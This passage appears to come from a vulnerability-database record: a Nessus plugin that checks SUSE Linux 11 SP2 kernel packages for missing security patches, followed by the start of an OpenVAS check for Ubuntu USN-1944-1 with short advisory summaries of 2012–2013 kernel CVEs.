sane in that case.\n\n - md/raid10: Fix two bug affecting RAID10 reshape (-).\n\n - Allow NFSv4 to run execute-only files. (bnc#765523)\n\n - fs/ocfs2/namei.c: remove unnecessary ERROR when removing\n non-empty directory. (bnc#819363)\n\n - block: Reserve only one queue tag for sync IO if only 3\n tags are available. (bnc#806396)\n\n - drm/i915: Add wait_for in init_ring_common. (bnc#813604)\n\n - drm/i915: Mark the ringbuffers as being in the GTT\n domain. (bnc#813604)\n\n - ext4: avoid hang when mounting non-journal filesystems\n with orphan list. (bnc#817377)\n\n - autofs4 - fix get_next_positive_subdir(). (bnc#819523)\n\n - ocfs2: Add bits_wanted while calculating credits in\n ocfs2_calc_extend_credits. (bnc#822077)\n\n - re-enable io tracing. (bnc#785901)\n\n - SUNRPC: Prevent an rpc_task wakeup race. (bnc#825591)\n\n - tg3: Prevent system hang during repeated EEH errors.\n (bnc#822066)\n\n - backends: Check for insane amounts of requests on the\n ring.\n\n - Update Xen patches to 3.0.82.\n\n - netiucv: Hold rtnl between name allocation and device\n registration. (bnc#824159)\n\n - drm/edid: Do not print messages regarding stereo or\n csync by default. (bnc#821235)\n\n - net/sunrpc: xpt_auth_cache should be ignored when\n expired. (bnc#803320)\n\n - sunrpc/cache: ensure items removed from cache do not\n have pending upcalls. (bnc#803320)\n\n - sunrpc/cache: remove races with queuing an upcall.\n (bnc#803320)\n\n - sunrpc/cache: use cache_fresh_unlocked consistently and\n correctly. (bnc#803320)\n\n - md/raid10 'enough' fixes. (bnc#773837)\n\n - Update config files: disable IP_PNP. (bnc#822825)\n\n - Disable efi pstore by default. (bnc#804482 / bnc#820172)\n\n - md: Fix problem with GET_BITMAP_FILE returning wrong\n status. (bnc#812974 / bnc#823497)\n\n - USB: xHCI: override bogus bulk wMaxPacketSize values.\n (bnc#823082)\n\n - ALSA: hda - Fix system panic when DMA > 40 bits for\n Nvidia audio controllers. (bnc#818465)\n\n - USB: UHCI: fix for suspend of virtual HP controller.\n (bnc#817035)\n\n - mm: mmu_notifier: re-fix freed page still mapped in\n secondary MMU. (bnc#821052)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=745640\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=760407\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=765523\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=773006\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=773255\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=773837\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=783475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=785901\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=789010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=801427\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=803320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=804482\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=805371\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=806396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=806976\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=807471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=807502\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=808940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=809122\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=812526\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=812974\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=813604\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=813733\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=814336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=815320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=816043\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=817035\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=817377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=818465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=819363\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=819523\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=820172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=820434\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=821052\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=821235\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=822066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=822077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=822575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=822825\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=823082\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=823342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=823497\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=823517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=824159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=824295\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=824915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=825048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=825142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=825227\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=825591\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=825657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=825887\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=826350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=826960\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=827372\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=827376\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=827378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=827749\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=827750\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=828119\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=828192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=828574\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=828714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=829082\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=829357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=829622\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=830901\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=831055\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=831058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=831410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=831949\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1059.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1774.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1819.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1929.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2148.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2164.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2232.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2234.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2237.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2851.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4162.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-4163.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 8263 / 8265 / 8273 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-trace-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-default-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-default-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-default-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-default-extra-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-pae-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-pae-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-pae-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-pae-extra-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-source-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-syms-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-trace-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-trace-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-trace-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-trace-extra-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-xen-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-xen-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-xen-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"kernel-xen-extra-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"xen-kmp-default-4.1.5_02_3.0.93_0.5-0.5.39\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"xen-kmp-pae-4.1.5_02_3.0.93_0.5-0.5.39\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"xen-kmp-trace-4.1.5_02_3.0.93_0.5-0.5.39\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-default-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-default-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-default-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-default-extra-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-source-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-syms-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-trace-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-trace-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-trace-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-trace-extra-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-xen-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"kernel-xen-extra-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"xen-kmp-default-4.1.5_02_3.0.93_0.5-0.5.39\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"xen-kmp-trace-4.1.5_02_3.0.93_0.5-0.5.39\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"kernel-default-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"kernel-default-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"kernel-default-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"kernel-source-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"kernel-syms-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"kernel-trace-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"kernel-trace-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"kernel-trace-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"kernel-ec2-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"kernel-ec2-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"kernel-ec2-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"kernel-pae-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"kernel-pae-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"kernel-pae-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"kernel-xen-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"kernel-xen-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"kernel-xen-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"xen-kmp-default-4.1.5_02_3.0.93_0.5-0.5.39\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"xen-kmp-pae-4.1.5_02_3.0.93_0.5-0.5.39\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"xen-kmp-trace-4.1.5_02_3.0.93_0.5-0.5.39\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"s390x\", reference:\"kernel-default-man-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"kernel-ec2-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"kernel-xen-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.93-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"xen-kmp-default-4.1.5_02_3.0.93_0.5-0.5.39\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"xen-kmp-trace-4.1.5_02_3.0.93_0.5-0.5.39\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2018-01-18T11:09:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "description": "Check for the Version of linux", "modified": "2018-01-17T00:00:00", "published": "2013-09-12T00:00:00", "id": "OPENVAS:841542", "href": "http://plugins.openvas.org/nasl.php?oid=841542", "type": "openvas", "title": "Ubuntu Update for linux USN-1944-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1944_1.nasl 8448 2018-01-17 16:18:06Z teissa $\n#\n# Ubuntu Update for linux USN-1944-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(841542);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-12 11:37:22 +0530 (Thu, 12 Sep 2013)\");\n script_cve_id(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-1060\", \"CVE-2013-2140\",\n \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-1944-1\");\n\n tag_insight = \"A denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service by creating a\nlarge number of files with names that have the same CRC32 hash value.\n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service (prevent file\ncreation) for a victim, by creating a file with a specific CRC32C hash\nvalue in a directory important to the victim. (CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local user could exploit this flaw to\nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a\nguest OS. A privileged user in the guest OS could exploit this flaw to\ndestroy data on the disk, even though the guest OS should not be able to\nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to\nconnect to an IPv4 destination. An unprivileged local user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation\nin the Linux kernel. An local user could exploit this flaw to examine\npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the\nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a\ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux\nkernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4163)\";\n\n tag_affected = \"linux on Ubuntu 12.10\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n 